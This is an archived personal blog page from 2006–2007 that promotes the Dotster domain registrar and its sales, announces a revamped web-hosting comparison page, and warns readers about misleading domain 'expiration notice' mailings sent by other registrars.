Continue reading "Russian and Ukrainian Blog Spammers are STUPID!" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

February 27, 2007

Dotster $7 Domain Registrations - One Day Only - Feb 28, 2007

If you are a website owner, and are thinking about adding another domain name, Dotster.com
is having a one day sale on all new domain registrations of the TLDs: .com, .net, .org, .biz and .us. For the 24 hour period beginning tomorrow, February 28, at 12:01 AM, through 11:59 PM, PST, all new Registrations are only $7.00 for one year! The regular price for these TLD registrations is $14.95/yr. That represents a savings of $7.95 bubba, and that ain't hay! Heck, at that price I'll grab a couple of new domain names and park them on my home page, or add them on to my BlueHost account, since they allow up to 5 additional domains to be hosted under one account, for free.

To grab your $7.00 domain go to Dotster.com
on Feb 28 and use the coupon code: 7domain, when you place the order.

I have more information about Dotster Domain Registratrar on my website. I also have a complete webpage about BlueHost, here.

Dotster is also offering coupon code discounts on a second year of web hosting (7hosting), and on their in-house website design services. Visit Dotster.com
before March 1, 2007, for the details.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

January 20, 2007

Domain Registrar - Liberty Names - Sends Misleading "Domain Name Expiration Notice"

If you own any Internet Domains you already know that they require a valid Domain Registrar to hold your registration information, before they can go live on a web host or server. I have had website domains since around the year 2000, and they have all been registered through the same Registrar; Dotster.

Today I received a deceptive letter in the mail from Liberty Names of America, apparently a Domain Registrar. At the top right, in large bold type it said: Domain Name Expiration Notice. After that, in small print, it stated: "As a courtesy, we would like to remind you that it's time to renew your domain name, which is expiring on April 27, 2007." Below that it listed one of my various domain names and a reply by date of March 14, 2007. The rest of the details in the letter are in small type, except for the parts where it outlines the renewal rates for 1, 2 and 5 years, and the place where the gullible would fill in their credit card details to "renew" their domain with these pirates.

As I stated in the first paragraph, Dotster, Inc. is and always has been my domain Registrar. Liberty Names Of America is harvesting the Whois records for as many domains as they can lookup, then sending out phony renewal notices to capture business away from the existing Registrars, by deceiving gullible recipients of these letters. To be fair, the letter does state, in small print, that they are not your current Registrar, and that they want you to transfer to them. The back side of the letter contains almost 7" of type that is so tiny that it requires a magnifying glass to read it. In that tiny type are the legal details and disclaimers for their transferring of your service.

As a reference to you all, I currently pay $14.95 per year (1 yr renewals) to maintain my domains at Dotster. Liberty Names is offering me the fabulous opportunity to transfer my domain away from $14.95 a year with Dotster to them, for the low rate of only $25.00! Hmmm. Simple math tells me that they are charging almost twice what Dotster charges for common TLD domain name registration. PIRATES! Take me off your mailing list, Liberty Names of America. You are slimeballs, just like DROA, who sends out similar Expiration Notices to domain owners. Are you the same slimeball company under a different name? Go F yourself!

Now that my tirade is over, if you really do need a decent domain registrar, one that won't dick you around, I recommend Dotster. For $14.95 you can register your domains, not $25, or $35, or $40 per year that the ripoff registrars charge. They do have sliding reduced rates for 5 or 10 year renewals and charge only $8.95 to transfer your existing domain, plus they add one year to it's expiration date.

Nuff said.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 31, 2006

My Website Hosting Page Has Been Totally Revamped

I finally put the finishing touches on my revamped website hosting page, found at www.wizcrafts.net/hosting.html, on August 30, 2006. This is the first major overhaul of that page in many months.

The old page made a very brief mention about what hosting is and only scraped at the surface of the concept of different types of hosting accounts. It then went on to list the detailed features of a few select web hosting companies, wih no mention of alternatives. to say the least it was lacking in breadth of coverage.

The new hosting page is totally the opposite in how it presents information. The first half of the page contains reasonably detailed explanations about what website hosting is, what web servers are, and details the differences between dedicated, semi-dedicated, VPS and shared web hosting.

The next section explains domain name registration and registrars.

Following that I have embedded a comparison of over 20 shared-hosting companies, outlining their allowed disk space, bandwidth (data transfer), email or FTP accounts, add-on domains policies and pricing (monthly and annual). I have also created separate pages detailing the features of the various hosting plans, showing as many features as the company publishes online. Those pages contain links to the companies and to alternate services like VPS servers. I have not finished the features pages for all of the listed web hosts, but am in the process of creating new ones every day or two. I am also trying to keep the disk space/bandwidth/pricing up to date, as several companies are frequently changing their plans to respond to their competitors.

I also plan to include a voting script on each features page, in the immediate future. I look forward to your input to help rate the various hosts according to your own experiences with them (not hearsay).

The final section of the new hosting page deals with website promotion tools and has several very useful links to help you get listed or improve you online business prospects.

Please avail yourselves of this information, found at www.wizcrafts.net/hosting.html

Continue reading "My Website Hosting Page Has Been Totally Revamped" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 19, 2006

Beware of DROA Domain Name Expiration Notice Postal Mailings

This is a heads-up warning to my fellow Domain owners to watch out if you get a letter in the mail from Domain Registry Of America, or some other Domain Registrar with whom you are not already affiliated as a customer.

Today I got a letter from Domain Registry Of America, addressed to my master account name used in the Whois Directory. The letter proclaims in large bold text:
Domain Name Expiration Notice
It then displays one of my Domain names that is due for renewal in 6 months and "As a courtesy to Domain name holders, we are sending you this notification ....."

Upon carefully reading the details they do make it clear that they are not your current Registrar, and want you to switch from you Registrar to DROA. They brag about only charging $30 for a one year renewal fee, and a bargain rate of only $50 for two years. There are checkboxes to place your order and a place to input your credit card numbers, which you would then mail in. There is a huge amount of information and disclaimers on the back of the letter that are in such a small font I had to get a magnifying glass to read it. I wouldn't transfer to these people if they were the last Registrar on earth.

If I was paying $35.00 a year for a Domain that would sound like a bargain, but I am a Dotster customer (see below), and only pay $14.95 per year for TLD Domains (or less if there is a special deal or Happy Hour Sale). If I was fooled into transferring to those people it would double the cost of renewing my Domains. Luckily I wasn't born yesterday.

Many Domains are owned by companies that have different people who know different details about the business, but not everything. These people are probably hoping that this letter will end up at Accounts Payable, where the secretary will call somebody to ask if they have a Domain that might need to be renewed, to which that person may say I think so. The Accounts Payable will pay the invoice by credit card and the company will have their Domain name transferred away from their current chosen Registrar by trickery, probably at increased expense.

I have seen other letters from other Registrars that never mentioned that they are not my current Registrar, asking for x amount of dollars to renew my expiring Domains. This is pure fraud, trying to get me to pay an invoice to a company with whom I have absolutely no relationship. If you do make the mistake of transferring your Domain to such a company you will probably never be able to get them to let you change back. Once a company like that gets your Domain name they make it almost impossible to transfer away from them. Legitimate Registrars have a simple method of locking and unlocking Domain transfers, with no fees (see below about Dotster).

As a Domain owner make it your business to know with whom your Domains are registered and what the renewal dates are for each Domain. Most Registrars with whom you are a customer will attempt to contact you by email first, to let you know 60 days in advance of a renewal date. Always check carefully when you receive a Domain renewal notcie to be sure it is from the Registrar who holds that Domain for you.

My Recommended Registrar:

If you are paying more than $14.95 a year for your Domains take my recommendation and check out Dotster.com. Dotster is an ICAAN Accredited Registrar and is above board all the way. They will not try to scam or trick you into unwittingly transferring a Domain to them. In fact, if you do transfer an existing Domain to Dotster they only charge $8.95 for the transfer and first year Registration, plus they extend your expiration date by an additional year. I have a lot more info about this on my Dotster web page. I have been a Dotster customer since the year 2000 and have never had a complaint about their services or methods of communications.

Continue reading "Beware of DROA Domain Name Expiration Notice Postal Mailings" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

April 24, 2006

Register New Domains At Dotster.com

The Happy Hour $2.00 Domain name sale has expired, at Dotster.com. I'll let you know when the next one is announced.

If you need to register a new or additional Domain name, I recommend Dotster, which is my Registrar. TLDs go for $14.95 /yr, and transfers are $8.95 with one additional year added to your expiration date, and they have a limited time sale on .info Domains, for only $2.99 for one year.

Use this link to go to the Dotster home page and search for your desired Domain name(s).

Dotster is my registrar for all of my Domains, and most of my Webmaster Services customers use them as well. Dotster is an ICAAN Accredited Registrar and has been around for quite a while now. I first learned about them from Leo LaPorte, on Tech TV. I have more details about their services on my Dotster web page, and on my web hosting page. Dotster accepts Domain registrations from people around the World.

I was there on the 26th and bought a new Domain name, www.computer-consulting-services.com and got a free .info with the same prefix. I'll be putting content on it over the next few weeks, but right now it is parked, waiting for my brain cells to wake up again. Watch my blog for details about this new Domain.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

Blog Links

Sponsored Message

I recommend Malwarebytes to protect your computers and Android devices from malicious code attacks. Malwarebytes detects and blocks spyware, viruses and ransomware, as well as rootkits. It removes malware from an already infected device. Get an 18 month subscription to Malwarebytes here.

If you're a fan of Robert Jordan's novels, you can buy boxed sets of The Wheel Of Time, here.

As an Amazon and Google Associate, I earn commissions from qualifying purchases.


CIDR to IPv4 Address Range Utility Tool | IPAddressGuide
CIDR to IPv4 Conversion



About the author
Wiz FeinbergWiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.

Follow @Wizcrafts on Twitter, where I post short updates on security issues, spam trends and things that just eat at my craw.

Follow Wizcrafts on Twitter



MailWasher Pro is an effective spam and web threat filter for your desktop email client.
MailWasher Pro is a POP3 email client spam filter
Download MailWasher Pro Here



Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
Powered by Movable Type

Use OpenDNS

back to top ^